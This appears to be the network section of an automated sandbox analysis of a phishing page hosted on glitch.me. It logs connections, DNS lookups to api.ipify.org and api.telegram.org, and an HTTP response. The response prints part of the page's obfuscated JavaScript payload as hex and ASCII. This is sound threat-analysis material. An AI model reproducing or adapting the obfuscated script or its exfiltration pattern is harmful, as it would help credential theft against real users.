                                  Jan 6, 2025 04:57:22.148364067 CET4434984413.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:22.148576975 CET49844443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:22.148576975 CET49844443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:22.148879051 CET49871443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:22.148927927 CET4434987113.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:22.149175882 CET49871443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:22.149175882 CET49871443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:22.149210930 CET4434987113.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:22.430711031 CET49843443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:22.430720091 CET4434984313.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:22.458789110 CET49844443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:22.458794117 CET4434984413.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:26.161276102 CET4434987013.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:26.161351919 CET49870443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:26.161509037 CET49870443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:26.161514044 CET4434987013.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:26.177891016 CET4434987113.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:26.180675030 CET49871443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:26.187021971 CET49871443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:26.187037945 CET4434987113.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:26.892380953 CET49901443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:26.892402887 CET4434990113.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:26.892493010 CET49901443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:26.892760038 CET49902443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:26.892801046 CET4434990213.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:26.892843962 CET49902443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:26.893563032 CET49902443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:26.893575907 CET4434990213.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:26.893939972 CET49901443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:26.893954039 CET4434990113.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:27.624008894 CET44349837172.217.18.4192.168.2.4
                                  Jan 6, 2025 04:57:27.624059916 CET44349837172.217.18.4192.168.2.4
                                  Jan 6, 2025 04:57:27.624109030 CET49837443192.168.2.4172.217.18.4
                                  Jan 6, 2025 04:57:29.008128881 CET49837443192.168.2.4172.217.18.4
                                  Jan 6, 2025 04:57:29.008136988 CET44349837172.217.18.4192.168.2.4
                                  Jan 6, 2025 04:57:30.925806999 CET4434990213.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:30.925864935 CET49902443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:30.926176071 CET49902443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:30.926194906 CET4434990213.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:30.926726103 CET49927443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:30.926743984 CET4434992713.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:30.926949978 CET49927443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:30.927213907 CET49927443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:30.927228928 CET4434992713.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:30.945565939 CET4434990113.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:30.945627928 CET49901443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:30.945733070 CET49901443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:30.945740938 CET4434990113.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:30.946054935 CET49928443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:30.946091890 CET4434992813.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:30.946146965 CET49928443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:30.946547985 CET49928443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:30.946563959 CET4434992813.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:34.991691113 CET4434992713.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:34.991780996 CET49927443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:34.991957903 CET49927443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:34.991970062 CET4434992713.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:35.021753073 CET4434992813.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:35.021836042 CET49928443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:35.022316933 CET49928443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:35.022336960 CET4434992813.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:35.623806000 CET49961443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:35.623837948 CET4434996113.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:35.624016047 CET49961443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:35.624156952 CET49962443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:35.624186993 CET4434996213.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:35.624238968 CET49962443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:35.624398947 CET49961443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:35.624413967 CET4434996113.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:35.624532938 CET49962443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:35.624545097 CET4434996213.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:39.680190086 CET4434996213.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:39.680253029 CET49962443192.168.2.413.209.60.147
                                  Jan 6, 2025 04:57:39.697712898 CET4434996113.209.60.147192.168.2.4
                                  Jan 6, 2025 04:57:39.697786093 CET49961443192.168.2.413.209.60.147
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 6, 2025 04:56:12.858522892 CET53507831.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:12.881227970 CET53510991.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:13.979545116 CET53512031.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:17.005574942 CET6361653192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:17.005686998 CET5547753192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:17.012360096 CET53554771.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:17.012375116 CET53636161.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:17.880162001 CET5948253192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:17.881297112 CET5804653192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:17.887033939 CET53594821.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:17.890460968 CET53580461.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:19.041490078 CET5166353192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:19.041630030 CET5467953192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:19.050169945 CET53546791.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:19.062844038 CET53516631.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:19.839731932 CET5789353192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:19.840078115 CET5212353192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:19.840512991 CET5177853192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:19.840687990 CET6424953192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:19.847781897 CET53578931.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:19.847893953 CET53521231.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:19.853003979 CET53523151.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:19.867825985 CET53631891.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:19.872848034 CET53642491.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:21.046489000 CET6016753192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:21.046797991 CET6422953192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:21.050082922 CET4920753192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:21.050205946 CET6011053192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:21.053492069 CET53601671.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:21.053822041 CET53642291.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:21.067884922 CET53601101.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:21.269018888 CET53529201.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:30.918847084 CET53550451.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:32.245583057 CET138138192.168.2.4192.168.2.255
                                  Jan 6, 2025 04:56:33.152849913 CET6534153192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:33.153120041 CET6544553192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:33.159588099 CET53653411.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:33.160151005 CET53654451.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:33.746511936 CET5034153192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:33.746666908 CET5854353192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:33.753022909 CET53503411.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:33.753721952 CET53585431.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:33.778894901 CET6052653192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:33.779032946 CET5503553192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:33.785762072 CET53550351.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:33.785773039 CET53605261.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:34.430521965 CET5819953192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:34.430820942 CET5970553192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:34.432548046 CET6018453192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:34.432845116 CET6008053192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:34.437331915 CET53581991.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:34.439119101 CET53601841.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:34.439688921 CET53600801.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:34.450212955 CET53597051.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:35.352968931 CET6392953192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:35.353128910 CET5359953192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:35.359565973 CET53639291.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:35.371227980 CET53535991.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:49.817733049 CET53538631.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:59.801431894 CET6147053192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:59.801605940 CET5802253192.168.2.41.1.1.1
                                  Jan 6, 2025 04:56:59.823755980 CET53580221.1.1.1192.168.2.4
                                  Jan 6, 2025 04:56:59.824309111 CET53614701.1.1.1192.168.2.4
                                  Jan 6, 2025 04:57:12.251950026 CET53624851.1.1.1192.168.2.4
                                  Jan 6, 2025 04:57:12.684743881 CET53574681.1.1.1192.168.2.4
                                  TimestampSource IPDest IPChecksumCodeType
                                  Jan 6, 2025 04:56:19.872987032 CET192.168.2.41.1.1.1c249(Port unreachable)Destination Unreachable
                                  Jan 6, 2025 04:56:34.450265884 CET192.168.2.41.1.1.1c235(Port unreachable)Destination Unreachable
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jan 6, 2025 04:56:17.005574942 CET192.168.2.41.1.1.10xedb1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:17.005686998 CET192.168.2.41.1.1.10xa9ccStandard query (0)www.google.com65IN (0x0001)false
                                  Jan 6, 2025 04:56:17.880162001 CET192.168.2.41.1.1.10xc684Standard query (0)www.google.co.thA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:17.881297112 CET192.168.2.41.1.1.10xd2aStandard query (0)www.google.co.th65IN (0x0001)false
                                  Jan 6, 2025 04:56:19.041490078 CET192.168.2.41.1.1.10xbfa9Standard query (0)phil-health-uk.glitch.meA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.041630030 CET192.168.2.41.1.1.10x6272Standard query (0)phil-health-uk.glitch.me65IN (0x0001)false
                                  Jan 6, 2025 04:56:19.839731932 CET192.168.2.41.1.1.10xcb21Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.840078115 CET192.168.2.41.1.1.10x4036Standard query (0)upload.wikimedia.org65IN (0x0001)false
                                  Jan 6, 2025 04:56:19.840512991 CET192.168.2.41.1.1.10x59ecStandard query (0)cdn.glitch.globalA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.840687990 CET192.168.2.41.1.1.10x3d7bStandard query (0)cdn.glitch.global65IN (0x0001)false
                                  Jan 6, 2025 04:56:21.046489000 CET192.168.2.41.1.1.10x2f49Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:21.046797991 CET192.168.2.41.1.1.10x4f81Standard query (0)upload.wikimedia.org65IN (0x0001)false
                                  Jan 6, 2025 04:56:21.050082922 CET192.168.2.41.1.1.10xdb98Standard query (0)cdn.glitch.globalA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:21.050205946 CET192.168.2.41.1.1.10xe6e8Standard query (0)cdn.glitch.global65IN (0x0001)false
                                  Jan 6, 2025 04:56:33.152849913 CET192.168.2.41.1.1.10xdb33Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:33.153120041 CET192.168.2.41.1.1.10xa1cStandard query (0)api.ipify.org65IN (0x0001)false
                                  Jan 6, 2025 04:56:33.746511936 CET192.168.2.41.1.1.10x5864Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:33.746666908 CET192.168.2.41.1.1.10x2fc3Standard query (0)api.ipify.org65IN (0x0001)false
                                  Jan 6, 2025 04:56:33.778894901 CET192.168.2.41.1.1.10x6fa7Standard query (0)dns.googleA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:33.779032946 CET192.168.2.41.1.1.10xd5dcStandard query (0)dns.google65IN (0x0001)false
                                  Jan 6, 2025 04:56:34.430521965 CET192.168.2.41.1.1.10x2242Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:34.430820942 CET192.168.2.41.1.1.10xe267Standard query (0)api.telegram.org65IN (0x0001)false
                                  Jan 6, 2025 04:56:34.432548046 CET192.168.2.41.1.1.10x9cddStandard query (0)dns.googleA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:34.432845116 CET192.168.2.41.1.1.10x1dbcStandard query (0)dns.google65IN (0x0001)false
                                  Jan 6, 2025 04:56:35.352968931 CET192.168.2.41.1.1.10xeaafStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:35.353128910 CET192.168.2.41.1.1.10xb9c7Standard query (0)api.telegram.org65IN (0x0001)false
                                  Jan 6, 2025 04:56:59.801431894 CET192.168.2.41.1.1.10xf525Standard query (0)hyundaielevator.comA (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:59.801605940 CET192.168.2.41.1.1.10x609dStandard query (0)hyundaielevator.com65IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jan 6, 2025 04:56:17.012360096 CET1.1.1.1192.168.2.40xa9ccNo error (0)www.google.com65IN (0x0001)false
                                  Jan 6, 2025 04:56:17.012375116 CET1.1.1.1192.168.2.40xedb1No error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:17.887033939 CET1.1.1.1192.168.2.40xc684No error (0)www.google.co.th142.250.185.99A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.062844038 CET1.1.1.1192.168.2.40xbfa9No error (0)phil-health-uk.glitch.me44.217.167.231A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.062844038 CET1.1.1.1192.168.2.40xbfa9No error (0)phil-health-uk.glitch.me44.199.73.166A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.062844038 CET1.1.1.1192.168.2.40xbfa9No error (0)phil-health-uk.glitch.me52.207.36.141A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.062844038 CET1.1.1.1192.168.2.40xbfa9No error (0)phil-health-uk.glitch.me34.231.249.1A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.062844038 CET1.1.1.1192.168.2.40xbfa9No error (0)phil-health-uk.glitch.me18.235.164.84A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.062844038 CET1.1.1.1192.168.2.40xbfa9No error (0)phil-health-uk.glitch.me34.234.46.6A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.062844038 CET1.1.1.1192.168.2.40xbfa9No error (0)phil-health-uk.glitch.me54.145.204.54A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.062844038 CET1.1.1.1192.168.2.40xbfa9No error (0)phil-health-uk.glitch.me34.233.109.53A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.847781897 CET1.1.1.1192.168.2.40xcb21No error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.850424051 CET1.1.1.1192.168.2.40x59ecNo error (0)cdn.glitch.globalj.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                  Jan 6, 2025 04:56:19.872848034 CET1.1.1.1192.168.2.40x3d7bNo error (0)cdn.glitch.globalj.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                  Jan 6, 2025 04:56:21.053492069 CET1.1.1.1192.168.2.40x2f49No error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:21.057303905 CET1.1.1.1192.168.2.40xdb98No error (0)cdn.glitch.globalj.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                  Jan 6, 2025 04:56:21.067884922 CET1.1.1.1192.168.2.40xe6e8No error (0)cdn.glitch.globalj.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                  Jan 6, 2025 04:56:33.159588099 CET1.1.1.1192.168.2.40xdb33No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:33.159588099 CET1.1.1.1192.168.2.40xdb33No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:33.159588099 CET1.1.1.1192.168.2.40xdb33No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:33.160151005 CET1.1.1.1192.168.2.40xa1cNo error (0)api.ipify.org65IN (0x0001)false
                                  Jan 6, 2025 04:56:33.753022909 CET1.1.1.1192.168.2.40x5864No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:33.753022909 CET1.1.1.1192.168.2.40x5864No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:33.753022909 CET1.1.1.1192.168.2.40x5864No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:33.753721952 CET1.1.1.1192.168.2.40x2fc3No error (0)api.ipify.org65IN (0x0001)false
                                  Jan 6, 2025 04:56:33.785773039 CET1.1.1.1192.168.2.40x6fa7No error (0)dns.google8.8.4.4A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:33.785773039 CET1.1.1.1192.168.2.40x6fa7No error (0)dns.google8.8.8.8A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:34.437331915 CET1.1.1.1192.168.2.40x2242No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:34.439119101 CET1.1.1.1192.168.2.40x9cddNo error (0)dns.google8.8.4.4A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:34.439119101 CET1.1.1.1192.168.2.40x9cddNo error (0)dns.google8.8.8.8A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:35.359565973 CET1.1.1.1192.168.2.40xeaafNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                  Jan 6, 2025 04:56:59.824309111 CET1.1.1.1192.168.2.40xf525No error (0)hyundaielevator.com13.209.60.147A (IP address)IN (0x0001)false
                                  • www.google.co.th
                                  • phil-health-uk.glitch.me
                                    • upload.wikimedia.org
                                    • api.ipify.org
                                    • dns.google
                                    • api.telegram.org
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.44974244.217.167.231801748C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  Jan 6, 2025 04:56:19.068325043 CET439OUTGET / HTTP/1.1
                                  Host: phil-health-uk.glitch.me
                                  Connection: keep-alive
                                  Upgrade-Insecure-Requests: 1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Encoding: gzip, deflate
                                  Accept-Language: en-US,en;q=0.9
                                  Jan 6, 2025 04:56:19.589687109 CET1236INHTTP/1.1 200 OK
                                  Date: Mon, 06 Jan 2025 03:56:19 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Content-Length: 49780
                                  Connection: keep-alive
                                  x-amz-id-2: KxXC1Iz2Lvlk9vRNir6x+ffRG2l4v8SwaD5+nlVDe/k3nQLn4KkvKAYpiTthuksBAiDTF1QNO0M=
                                  x-amz-request-id: G3MHVQZHPA0MEH6R
                                  last-modified: Mon, 06 Jan 2025 01:43:12 GMT
                                  etag: "0935e696f9e4a299615fe9e07ede10bd"
                                  x-amz-server-side-encryption: AES256
                                  cache-control: no-cache
                                  x-amz-version-id: Xs_QW3vnC3tRvx.zA3NgF30ROepnx_6m
                                  accept-ranges: bytes
                                  server: AmazonS3
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 46 75 6e 63 74 69 6f 6e 28 0a 20 20 20 20 27 5c 27 74 75 2b 34 68 7b 7d 61 25 63 71 79 2c 2e 77 2e 7a 2e 71 2e 7d 31 76 2c 78 77 38 75 72 35 70 33 77 5d 25 6b 21 37 31 37 73 79 71 35 6a 32 67 69 2e 70 23 7d 6f 65 23 70 6b 78 7b 74 36 61 33 6c 2a 77 70 5f 21 6a 7a 5f 66 2a 2d 23 31 7d 72 73 77 2b 36 7a 5e 77 6e 6a 6f 71 78 65 75 34 72 2c 78 6f 6c 61 7e 5e 6b 5d 79 6d 37 71 75 73 37 39 73 40 38 7a 5b 36 7d 23 5b 21 36 7e 68 31 69 65 7a 25 6e 34 5b 7e 6f 72 32 63 26 39 31 35 6d 38 35 6e 2d 26 33 40 66 63 6c 74 2a 38 5e 75 2b 2b 78 2e 72 61 2c 6e 6b 38 65 71 5d 7e 7e 6b 31 71 25 2c 79 6a 6f 76 7a 70 40 25 6e 21 67 35 68 6e 7d 76 79 7a 32 38 65 6e 6a 5e 63 66 5b 76 7d 39 35 74 73 5b 65 73 71 39 65 65 74 35 31 36 33 37 79 6b 5e 5e 33 65 66 6a 67 2a 33 5d 6a 40 39 61 71 5d 34 26 5d 5d 76 5f 6d 79 2d 26 39 6a 68 23 2b 23 2c 7b 33 7b 33 6b 7a 32 61 6c 5b 67 66 63 74 69 40 21 26 66 40 63 32 65 75 31 6e 7b 71 38 2d 2b 77 35 37 66 [TRUNCATED]
                                  Data Ascii: <!DOCTYPE html><script> Function( '\'tu+4h{}a%cqy,.w.z.q.}1v,xw8ur5p3w]%k!717syq5j2gi.p#}oe#pkx{t6a3l*wp_!jz_f*-#1}rsw+6z^wnjoqxeu4r,xola~^k]ym7qus79s@8z[6}#[!6~h1iez%n4[~or2c&915m85n-&3@fclt*8^u++x.ra,nk8eq]~~k1q%,yjovzp@%n!g5hn}vyz28enj^cf[v}95ts[esq9eet51637yk^^3efjg*3]j@9aq]4&]]v_my-&9jh#+#,{3{3kz2al[gfcti@!&f@c2eu1n{q8-+w57f2~i[g9*@xhxe+7ehkvme%[{g@m%vx3*uhs_r]^o%p7croew&9!we9x[!nmlv%her{!2o}*ui^7!~.5,2-#&v6v}t6_rm{~*-sfctl7-.4ul,4p[18mfa#syaz6^*o+3gc5]-&.ezhm.sci8i-a6pke2]{gy^2epi&gmt9l,~_l,jra4we-%n{pht4_i4y@4ikxl*@_#j_+u}!+8~&6_fg1#o\';_A50H35mL12qk99eWjM12SQ049X1R4ejpfo=(_A50H35mL12qk99eWjM12SQ049X1R4ejelect)=>!_A50H35mL12qk99eWjM12SQ049X1R4ejelect?"0QsupcVnlVictmeF"[_QTW7v07E7O88q9h34lb8s995Gkyp1qU
                                  Jan 6, 2025 04:56:19.589704990 CET1236INData Raw: 6b 30 63 31 42 33 65 37 35 42 7a 28 29 5d 28 2f 5b 6e 6d 56 63 30 65 46 75 51 5d 2f 67 2c 22 22 29 3a 28 5f 41 35 30 48 33 35 6d 4c 31 32 71 6b 39 39 65 57 6a 4d 31 32 53 51 30 34 39 58 31 52 34 65 6a 65 6c 65 63 74 3d 3d 31 3f 22 4a 56 66 70 6f
                                  Data Ascii: k0c1B3e75Bz()](/[nmVc0eFuQ]/g,""):(_A50H35mL12qk99eWjM12SQ049X1R4ejelect==1?"JVfpomwrwvEVXax6c41mhp"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()](/[wxpm1v6X4VJ]/g,""):"ZrFSMsuJnpgc054tUijoIMnUYg"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz()
                                  Jan 6, 2025 04:56:19.589726925 CET1236INData Raw: 6a 51 52 47 34 37 68 6b 67 77 46 6c 75 30 49 e2 80 8f 5f 58 41 75 5a 57 50 4d 38 61 38 6e 56 42 35 71 72 6c 4e 38 57 55 46 55 5a 7a 72 35 4c 45 47 6b 64 4a 73 e2 80 8e 71 65 68 72 57 58 36 72 57 34 38 6f 38 4c 72 45 54 71 e2 80 8d 38 71 45 68 36
                                  Data Ascii: jQRG47hkgwFlu0I_XAuZWPM8a8nVB5qrlN8WUFUZzr5LEGkdJsqehrWX6rW48o8LrETq8qEh6LW4TX\\"[\\"9FsvIphlKFieP7t2Z\\"[_QTW7v07E7O88q9h34lb8s995Gkyp1qUk0c1B3e75Bz](/[FPhv9ZK7I2e]/g,\\"\\")](\\"\\")[\\"6NfdZeoIdrUEb1aCic2QShVKK\\"[_QTW7v07E7O88q
                                  Jan 6, 2025 04:56:19.589736938 CET1236INData Raw: 4d 34 2c 5f 4c 43 35 77 34 7a 71 35 38 46 31 52 34 67 47 6a 37 76 79 4b 6d 38 67 37 34 45 42 6d 77 73 29 3b 5f 43 36 75 34 54 36 63 6a 36 62 39 5b 5c 27 30 5c 27 5d 3d 28 29 3d 3e 7b 5f 43 53 67 57 32 68 34 30 38 4a 45 38 72 73 78 39 68 34 78 5a
                                  Data Ascii: M4,_LC5w4zq58F1R4gGj7vyKm8g74EBmws);_C6u4T6cj6b9[\'0\']=()=>{_CSgW2h408JE8rsx9h4xZ2qQ6Acwt0SmsS7IVzB2C71LkMLnM[_$._OZCd9m9nFI6h1zhJHZIU](_$._XAuZWPM8a8nVB5qrlN8WUFUZzr5LEGkdJs,_LC5w4zq58F1R4gGj7vyKm8g74EBmws);};})();_C6u4T6cj6b9._ZRHfJgjD4r
                                  Jan 6, 2025 04:56:19.589747906 CET1236INData Raw: 31 38 59 43 7b 37 36 46 62 62 31 34 37 30 39 33 44 30 33 37 39 39 62 66 32 43 38 33 44 41 33 31 38 38 64 66 33 36 38 64 65 34 33 62 39 32 58 39 39 30 44 38 33 32 38 39 58 35 34 31 39 31 59 59 66 38 35 46 43 31 58 37 35 34 41 59 51 32 35 39 62 30
                                  Data Ascii: 18YC{76Fbb147093D03799bf2C83DA3188df368de43b92X990D83289X54191YYf85FC1X754AYQ259b0P75XY5VC63ba11aa@059Y8{Y6Dc11X6XbbDY6Xc91471C6F22FDY2f8093e981X43Y8eX8I652A9348Ced*494f044A6ec4865f551abF54badC7227fd05683_529b4d460b8e56987X54096e63AC6f3489aed7
                                  Jan 6, 2025 04:56:19.589756966 CET1236INData Raw: 31 58 37 35 63 63 32 33 37 41 64 31 32 38 63 31 31 37 37 30 43 46 32 32 38 34 44 38 33 35 38 35 44 32 46 32 37 66 58 32 33 36 39 30 65 61 50 39 34 36 65 66 33 62 38 44 58 33 28 31 36 30 59 33 66 65 36 35 59 38 21 33 36 41 62 64 53 38 36 66 43 34
